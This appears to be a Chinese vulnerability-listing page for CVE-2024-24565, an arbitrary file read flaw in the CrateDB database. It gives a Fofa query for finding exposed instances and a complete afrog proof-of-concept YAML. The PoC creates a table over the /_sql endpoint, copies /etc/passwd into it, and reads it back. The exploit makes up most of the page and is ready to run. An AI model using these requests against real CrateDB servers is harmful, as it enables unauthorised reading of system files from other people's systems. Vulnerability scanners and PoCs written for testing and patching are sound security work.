CVE-2024-24565: CrateDB数据库任意文件读取漏洞

日期: 2025-09-01 | 影响软件: CrateDB数据库 | POC: 已公开

漏洞描述

Fofa: title="CrateDB"

PoC代码[已公开]

id: CVE-2024-24565

info:
  name: CrateDB数据库任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: title="CrateDB"
  reference:
    - https://mp.weixin.qq.com/s/43ciyt7QFR3k3kjdfxZ7kQ
  tags: cve,cve2024,fileread
  created: 2024/02/21

set:
  tablename: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"CREATE TABLE {{tablename}}(info_leak STRING)"}
    expression: response.status == 200
  r1:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"COPY {{tablename}} FROM '/etc/passwd' with (format='csv', header=false)"}
    expression: response.status == 200
  r2:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"SELECT * FROM {{tablename}} limit 10"}
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1() && r2()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2024/CVE-2024-24565.yaml

相关漏洞推荐